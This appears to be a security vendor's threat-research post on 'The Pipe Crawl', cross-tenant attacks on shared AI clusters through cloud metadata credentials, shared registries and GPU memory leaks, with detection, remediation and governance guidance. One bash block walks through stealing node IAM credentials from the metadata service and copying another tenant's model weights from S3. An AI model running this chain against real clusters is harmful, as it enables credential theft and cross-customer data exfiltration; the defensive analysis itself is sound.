The Pipe Crawl: How Shared AI Compute Lets Attackers Slide Between Tenants

Liad Matusovsky
🚰
The Pipe Crawl. Attackers are bypassing the thick walls of container isolation by sliding through the cluster's shared plumbing - shared node identity, shared registries, shared GPU memory - to emerge inside other tenants' data. If you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.

Executive Summary

  • We track this pattern as The Pipe Crawl: a single compromised AI workload sliding through shared GPU VRAM, shared Kubernetes networking, and shared node identity to reach every other tenant on the same cluster.
  • GPU cost pressure is driving dense multi-tenancy in AI inference platforms, which collapses container boundaries into shared plumbing.
  • One compromised workload can pivot to other organizations' models, data, and credentials via IMDS, registry poisoning, or GPU memory residuals (CVE-2023-4969, publicly disclosed as "LeftoverLocals").
  • Until you isolate hardware, registries, and node identity, one customer's breach is every customer's breach on the same cluster.
  • Arrakis treats every AI workload as untrusted by default and tags every inference request with a tenant identity, so a Pipe Crawl attempt fails at the boundary instead of at the audit.
The Pipe Crawl: shared plumbing between isolated cells.

Scope & Assumptions

🎯
Applies to: Multi-tenant AI inference and training platforms where workloads from different organizations share a Kubernetes cluster, a GPU, a node IAM role, or a container registry - the "pipes" between cells.

Does not apply to: Single-tenant or fully air-gapped deployments where each customer has dedicated hardware, dedicated registries, and dedicated cloud identity.

Required preconditions for the full Pipe Crawl chain: (1) attacker can execute code inside one tenant workload, (2) workload has reachable IMDS or shared GPU memory, (3) blast radius is not contained by network policy or hardware isolation.

Why this matters

Multi-tenancy turns one breach into many.

When AI platforms optimize for utilization, they often treat containers and namespaces as a hard boundary. In practice, that boundary is soft, and the pipes between cells are wide:

  • Kubernetes misconfigurations and over-privileged nodes make lateral movement realistic.
  • Shared build systems and registries expand blast radius across tenants.
  • GPU memory reuse can leak data even when network paths are locked down.

The walls look like concrete. The plumbing is what carries the breach.

Container walls feel solid. The plumbing is what carries the breach.

The Origin Story (Discovery)

The illusion of "secure multi-tenancy" in AI platforms collapses when you stop looking only at the models and start looking at the infrastructure they run on.

A strong demonstration came from Wiz Research, who analyzed Hugging Face's tenant-isolation architecture. The initial access path was not exotic. It used a malicious pickle model (a known vector) to obtain code execution and a reverse shell.

From there, the escalation path looked like classic cloud compromise:

  • Query the EC2 Instance Metadata Service (IMDS) of the underlying Amazon EKS node
  • Extract node-level IAM credentials
  • Use those credentials to enumerate and access other customers' assets sharing the cluster

In parallel, researchers highlighted another critical risk: Hugging Face Spaces accepted user-provided Dockerfiles with insufficient build isolation. That made it possible to write into a centralized container registry serving all platform customers.

Finally, CVE-2023-4969 (publicly disclosed as "LeftoverLocals") demonstrated that isolation can fail at the silicon level. On affected GPUs, a process can read residual data left in GPU memory by another tenant's workload that previously ran on the same physical GPU.

Message: if you share hardware in the AI ecosystem, you should assume you share risk and potentially share data.


The Technical Autopsy: Crawling the Pipes

The Pipe Crawl starts with an entry vector and then traverses one or more pipes between cells. The entry vector is most often the pickle pipe - code execution from a malicious model upload, poisoned RAG document, or CI/CD injection. Once inside, four pipes connect the compromised cell to every other tenant on the cluster:

  1. The IMDS pipe - reach the host's metadata service from inside a pod and steal the node IAM role
  2. The Identity pipe - use that node identity to call cloud APIs the pod was never meant to call
  3. The Registry pipe - poison or pull from a shared container registry that serves every tenant
  4. The GPU VRAM pipe - read residual memory left by a previous tenant's inference job

Most real-world Pipe Crawls chain pipes 1, 2, and either 3 or 4. The IMDS and Identity pipes are the fastest path; the GPU VRAM pipe is the stealthiest.

| Pipe | What flows through it |
| --- | --- |
| IMDS pipe | Compromised pod → host metadata service to steal the node IAM role |
| Identity pipe | Node IAM role → cross-tenant cloud API calls (S3, ECR, secrets) |
| Registry pipe | Compromised pod → shared container registry → poisoned images served to other tenants |
| GPU VRAM pipe | Compromised pod → same physical GPU → residual VRAM from previous tenant's job is readable |

Framework mapping: MITRE ATLAS AML.T0010 (ML Supply Chain Compromise) and AML.T0049 (Exploit Public-Facing Application) cover the pickle entry and the boundary escape. AML.T0024.000 (Infer Training Data Membership) is the closest mapping for the GPU residual case. OWASP LLM03 Supply Chain and LLM05 Improper Output Handling anchor the pickle entry point.

The cleanest illustration is to walk the chain end to end. We start inside a container on a shared EKS node - the pickle pipe has already given us code execution via a malicious model upload. Every line below is a real command an attacker runs, in order.

```bash
# STAGE 1 - The IMDS pipe: steal the node's IAM identity from inside our pod.
# EKS managed node groups commonly ship with httpPutResponseHopLimit = 2,
# which means a container can reach the host's IMDS even when IMDSv2 is "enforced".
TOKEN=$(curl -sX PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

ROLE=$(curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/)

curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE
# {
#   "AccessKeyId":     "ASIA...",
#   "SecretAccessKey": "...",
#   "Token":           "...",
#   "Expiration":      "2026-01-29T18:30:00Z"
# }

# STAGE 2 - Wear the node's identity in our own shell.
# This role is attached to the host, not the pod. Every workload scheduled on
# this node - including other tenants' pods - shares it.
export AWS_ACCESS_KEY_ID="ASIA..."
export AWS_SECRET_ACCESS_KEY="..."
export AWS_SESSION_TOKEN="..."

# STAGE 3 - Cross-tenant access via the Identity pipe: read assets we never owned.
# Enumerate every S3 bucket this node role can see. The result almost always
# includes other customers' model and dataset buckets.
aws s3 ls

# Walk into a competing tenant's private model bucket and exfiltrate weights
# using the cluster's own credentials. To S3, this looks like normal cluster traffic.
aws s3 cp s3://acme-prod-models/checkpoint.safetensors ./loot.safetensors
```

The threat lands at the JSON drop in Stage 1: AccessKeyId, SecretAccessKey, and Token are node-level cloud identity, not pod identity. By Stage 3 the attacker is reading a competing tenant's model weights with the cluster's own credentials - no zero-day, no exploit, just the plumbing the platform itself wired up.
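
Defenders can turn the Stage 1 token request into a harmless self-test. The sketch below is a minimal probe, assuming it runs inside a workload pod with curl available; the function names classify_imds_status and probe_imds are hypothetical. It only asks IMDS for a session token and reports whether one was issued. It never requests credentials.

```bash
#!/usr/bin/env bash
# Hypothetical helper: interpret the HTTP status of an IMDSv2 token request.
classify_imds_status() {
  case "$1" in
    200) echo "EXPOSED" ;;            # token issued: this pod can reach the node's IMDS
    000) echo "BLOCKED" ;;            # curl reports 000 when no HTTP response arrived
    *)   echo "NO_TOKEN (HTTP $1)" ;; # IMDS answered but issued no token; investigate
  esac
}

# Hypothetical probe: send the same PUT an attacker would, with a short timeout.
probe_imds() {
  local code
  code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 2 \
    -X PUT "http://169.254.169.254/latest/api/token" \
    -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
  classify_imds_status "$code"
}
```

Running probe_imds from a pod on a hardened node should print BLOCKED, since a hop limit of 1 or an egress block prevents the token response from ever reaching the container.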

If an attacker can exploit a GPU memory leak such as CVE-2023-4969, they may not need a network path at all. They can run their own GPU job and read residual, un-wiped memory left behind by another tenant's inference job. Network monitoring raises no alert, because nothing crossed the network boundary.


Attacker Goals and Impact

The Pipe Crawl is optimized for espionage and mass data theft.

AI platforms centralize high-value assets:

  • Proprietary model weights
  • Customer datasets
  • Source code and internal documentation
  • Sensitive user conversations and prompts

By targeting shared compute infrastructure rather than a single application, attackers gain economies of scale. One Pipe Crawl can compromise dozens of organizations in a single chain, and it can trigger regulatory exposure under GDPR and the EU AI Act as well as SOC 2 audit findings.


Detection & Response

This is the operational layer. Each signal below is tagged with the pipe it monitors so the reader knows where the alert lives in the architecture.

| Pipe | Signal | What to alert on |
| --- | --- | --- |
| IMDS pipe | IMDS access from container | Any HTTP request to 169.254.169.254 originating from a pod CIDR |
| IMDS pipe | IMDSv1 fallback | Requests to IMDS without the X-aws-ec2-metadata-token header |
| Identity pipe | STS calls from pod identity | AssumeRole or GetCallerIdentity from a node role inside a workload namespace |
| Registry pipe | Cross-namespace registry pulls | Image pulls referencing a tenant-foreign namespace path |
| GPU VRAM pipe | Residual access pattern | Workloads allocating GPU memory immediately after another tenant's job ends on the same device |

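
The first IMDS signal above can be approximated offline against exported flow records. This is a minimal sketch, assuming a simplified, hypothetical record format of `<src_ip> <dst_ip> <dst_port>` per line (real flow logs carry more fields) and an assumed pod CIDR passed as the only argument; find_imds_flows is an illustrative name, not part of any tool.

```bash
#!/usr/bin/env bash
# Hypothetical input on stdin: one flow per line as "<src_ip> <dst_ip> <dst_port>".
# Prints every flow whose source lies inside the given pod CIDR and whose
# destination is the IMDS address.
find_imds_flows() {
  local cidr="$1"   # assumed pod CIDR, e.g. 10.42.0.0/16
  awk -v cidr="$cidr" '
    # Convert a dotted-quad IPv4 address to a single number.
    function ip2int(ip,    p) {
      split(ip, p, ".")
      return ((p[1] * 256 + p[2]) * 256 + p[3]) * 256 + p[4]
    }
    BEGIN {
      split(cidr, c, "/")
      size = 2 ^ (32 - c[2])                    # number of addresses in the CIDR
      base = int(ip2int(c[1]) / size) * size    # first address in the CIDR
    }
    $2 == "169.254.169.254" {
      src = ip2int($1)
      if (src >= base && src < base + size) print $1, $2, $3
    }
  '
}
```

For example, `find_imds_flows 10.42.0.0/16 < flows.txt` lists only the pod-originated IMDS flows; in a hardened cluster the output should be empty.
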
  • Search container egress for any traffic to 169.254.169.254 - it should be zero in a hardened cluster
  • Audit every pod with hostNetwork: true or an unrestricted IMDS hop limit
  • Review CloudTrail for sts:AssumeRole calls where the source identity is a node role and the session is initiated from a workload subnet
  • Diff your container registry's image push history against your tenant-to-namespace map - any cross-tenant pushes are P0
  • Validate that GPU scheduling policy enforces tenant-pinning or VRAM scrubbing between jobs

  • Isolate the suspect pod and snapshot the node before terminating
  • Rotate the node IAM role credentials immediately; do not wait for STS expiry
  • Enumerate every customer whose workload ran on the same node in the last 24h - they are all in scope
  • Pull the registry audit log; check for any image push from the compromised namespace
  • If the GPU was shared, treat all other tenants on that physical GPU as potentially exposed and notify per breach-disclosure SLA
  • File the incident with mapping to AML.T0010 and LLM03 for downstream reporting
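
The registry check above (diffing push history against the tenant-to-namespace map) lends itself to a small script. The following is a sketch under stated assumptions: both input formats are hypothetical, and cross_tenant_pushes is an illustrative name. It flags any push into a registry namespace that is owned by a different tenant or that is missing from the map.

```bash
#!/usr/bin/env bash
# Hypothetical inputs:
#   map file ($1): "<tenant> <registry_namespace>" per line
#   push log (stdin): "<pushing_tenant> <namespace>/<image>:<tag>" per line
# Prints each push whose target namespace is not owned by the pushing tenant.
cross_tenant_pushes() {
  local map_file="$1"
  awk '
    NR == FNR { owner[$2] = $1; next }   # first file: namespace -> owning tenant
    {
      split($2, path, "/")               # path[1] is the registry namespace
      if (!(path[1] in owner) || owner[path[1]] != $1) print $0
    }
  ' "$map_file" -
}
```

A clean registry produces no output; every printed line is a push that the triage list above treats as P0.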

Governance & Assurance

This section answers three questions: are we exposed, what are we accountable for, and what proves we are handling it.

  • The Pipe Crawl is an infrastructure-layer failure, not a model-layer failure. It does not show up in model evaluations, red-team transcripts, or prompt-injection benchmarks. It surfaces in cloud security posture, Kubernetes hardening, and supply-chain controls.
  • A single Pipe Crawl event is a multi-customer breach event by definition. Disclosure obligations, contractual MSAs, and regulator timelines are triggered for every co-tenant on the affected node, cluster, or GPU - not just the one that was first compromised.

| Framework | Relevant control | Required evidence |
| --- | --- | --- |
| SOC 2 (CC6.1, CC6.6) | Logical access boundaries between tenants | Network policy, IAM segmentation, registry isolation |
| ISO 27001 A.8.22 | Segregation of networks | Per-tenant namespace and network policy proof |
| NIST AI RMF (Manage 2.3) | Third-party AI risk management | Inventory of shared AI infra dependencies |
| GDPR Art. 32 | Security of processing | Demonstrable hardware or cryptographic isolation for personal data workloads |
| EU AI Act (Art. 15) | Cybersecurity of high-risk AI systems | Documented isolation architecture and breach-containment design |

  • Which of our AI workloads run on shared infrastructure with workloads from other organizations?
  • Is IMDSv2 enforced with hop limit 1 on every node hosting AI workloads?
  • Do we have a documented blast-radius map for each shared cluster, registry, and GPU pool?
  • Can we produce, for any customer, the list of co-tenants their data shared hardware with in the last 12 months?
  • What is our defined breach-notification path when the affected party is a co-tenant rather than the primary customer?
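
The co-tenancy question above becomes answerable once scheduling history is retained in a queryable form. As a minimal sketch, assume a hypothetical placement log with one line per workload run, formatted as `<start_epoch> <end_epoch> <node> <tenant>`; the co_tenants function name is likewise an assumption. It lists every tenant whose workload overlapped a time window on a given node.

```bash
#!/usr/bin/env bash
# Hypothetical placement log on stdin: "<start_epoch> <end_epoch> <node> <tenant>".
# Prints the distinct tenants that ran on NODE at any point within [FROM, TO].
co_tenants() {
  local node="$1" from="$2" to="$3"
  awk -v node="$node" -v from="$from" -v to="$to" '
    # A run overlaps the window if it started before the window ended
    # and ended after the window started.
    $3 == node && $1 <= to && $2 >= from { print $4 }
  ' | sort -u
}
```

The same query, keyed by GPU device or registry instead of node, would cover the other shared resources; the 12-month horizon only works if the placement log is retained that long.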

The Fallout (Systemic Failure)

The root cause is a business tradeoff, not a technical inevitability.

To offset GPU cost, platforms pack as many workloads onto a cluster as possible. That density frequently comes with:

  • Shared container registries
  • Permissive cross-namespace networking
  • Over-privileged nodes
  • IMDS exposure from workloads
  • GPU pools with no scrubbing between tenants

The Wiz Research findings and CVE-2023-4969 (LeftoverLocals) are reminders that treating containerization as a hard security boundary is a mistake. The container is the cell. The cluster is the prison. The pipes are how you get out.


How Arrakis sees The Pipe Crawl

Most AI security tooling stares at the cell door - the model, the prompt, the output filter. The Pipe Crawl is what happens when you stop watching the door and start watching the pipes: the shared GPU, the shared cluster, the shared registry, the shared node identity.

We see The Pipe Crawl as the canonical example of a Tier 3 cross-boundary violation: an attack that uses an AI workload as a beachhead but spends most of its life cycle in classic cloud-infrastructure territory. That is why model-layer guardrails miss it entirely, and why posture tools that do not model tenancy cannot tell you who is actually exposed when one tenant is compromised.

Arrakis approaches multi-tenant AI infrastructure from three angles:

  • Tenant identity at the request layer - every inference and tool call is tagged with a tenant, so cross-tenant access fails closed instead of leaking through shared identity
  • Blast-radius mapping for the pipes - continuous inventory of which workloads share clusters, GPUs, and registries, so a single compromise produces a deterministic list of co-exposed tenants
  • AI-aware detections for the cloud control plane - the IMDS, STS, registry, and GPU-residual signals from the Detection section above, correlated against AI workload identity rather than just pod identity

Remediation

Engineering teams should design AI infrastructure assuming containers will be breached. Close the obvious pipes this sprint, then re-pour the walls this quarter.

  • Block egress to 169.254.169.254 from all AI workload pods
  • Enforce IMDSv2 with hop limit 1 on every node hosting AI workloads
  • Apply default-deny NetworkPolicy between AI workload namespaces
  • Audit and rotate any node IAM role attached to a workload that runs untrusted user code
  • Disable user-supplied Dockerfiles writing into shared registries; isolate builds per tenant
  • Move sensitive customer workloads onto dedicated GPUs and dedicated nodes
  • Implement VRAM scrubbing or tenant-pinned GPU scheduling to mitigate residuals of the CVE-2023-4969 (LeftoverLocals) class
  • Stand up tenant-tagged request enforcement at the inference gateway
  • Produce and continuously maintain a co-tenancy map for breach-notification readiness
  • Add Pipe Crawl scenarios to red-team scope and tabletop exercises
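
The first two remediation items can be sketched in a few lines. The example below is illustrative rather than a drop-in control: the function names and the policy name block-imds-egress are hypothetical, the NetworkPolicy only takes effect on a CNI that enforces egress policy, and it does not cover pods running with hostNetwork: true. The AWS CLI call uses the documented modify-instance-metadata-options flags.

```bash
#!/usr/bin/env bash
# Hypothetical helper: print a NetworkPolicy that allows egress everywhere
# except the IMDS address, for every pod in the given namespace.
emit_imds_egress_policy() {
  local ns="$1"
  cat <<EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-imds-egress
  namespace: ${ns}
spec:
  podSelector: {}
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.169.254/32
EOF
}

# Hypothetical helper: require IMDSv2 and set the hop limit to 1 on one instance,
# so token responses cannot travel the extra network hop into a container.
enforce_imdsv2() {
  aws ec2 modify-instance-metadata-options \
    --instance-id "$1" \
    --http-tokens required \
    --http-put-response-hop-limit 1
}
```

A typical use would be `emit_imds_egress_policy tenant-a | kubectl apply -f -`. NetworkPolicy rules are additive allow-lists, so this policy permits all other egress; in a namespace that already runs default-deny egress, never allow-listing 169.254.169.254 achieves the same result. For node groups, the metadata options also belong in the launch template so that replacement nodes inherit them.
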

| Indicator Type | Value | Description |
| --- | --- | --- |
| Vulnerability | CVE-2023-4969 | "LeftoverLocals" vulnerability: GPU memory leaks that enable cross-tenant data exfiltration. |
| Network Target | 169.254.169.254 | The cloud Instance Metadata Service (IMDS) IPv4 endpoint, commonly targeted during container escapes. |
| Attack Vector | IMDS EKS Escape | Escalation from container execution to node-level credentials via the EC2 IMDS on an Amazon EKS node. |
| Attack Vector | Shared Container Registry | Insufficient build isolation allowing rogue Dockerfiles to poison centralized registries serving multiple customers. |

The walls of container isolation are advertised as concrete. The Pipe Crawl is the reminder that every cluster also has plumbing, and the plumbing connects every cell. Until the pipes are isolated, the threat model is shared, and so is the breach.
